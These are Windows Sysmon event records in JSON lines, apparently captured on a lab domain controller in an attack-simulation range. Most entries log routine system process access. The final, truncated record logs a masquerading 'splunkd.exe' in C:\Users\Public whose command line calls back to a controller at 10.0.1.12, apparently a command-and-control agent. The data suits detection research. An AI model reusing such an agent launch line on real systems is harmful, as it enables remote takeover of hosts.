{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1095,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1096,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1097,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1098,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1099,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.181\r\nProcessGuid: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nProcessId: 2964\r\nImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nFileVersion: 10.0.14393.3564 (rs1_release.200303-1942)\r\nDescription: Windows Modules Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TrustedInstaller.exe\r\nCommandLine: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.181","ProcessGuid":"{41C8662E-1F69-5F25-0000-0010EE870200}","Image":"C:\\Windows\\servicing\\TrustedInstaller.exe","FileVersion":"10.0.14393.3564 (rs1_release.200303-1942)","Description":"Windows Modules Installer","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TrustedInstaller.exe","CommandLine":"C:\\Windows\\servicing\\TrustedInstaller.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1100,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1101,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1102,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010EE870200}\r\nTargetProcessId: 2964\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010EE870200}","TargetProcessId":"2964","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1103,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.170\r\nProcessGuid: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nProcessId: 2956\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010923B0100}\r\nParentProcessId: 2112\r\nParentImage: 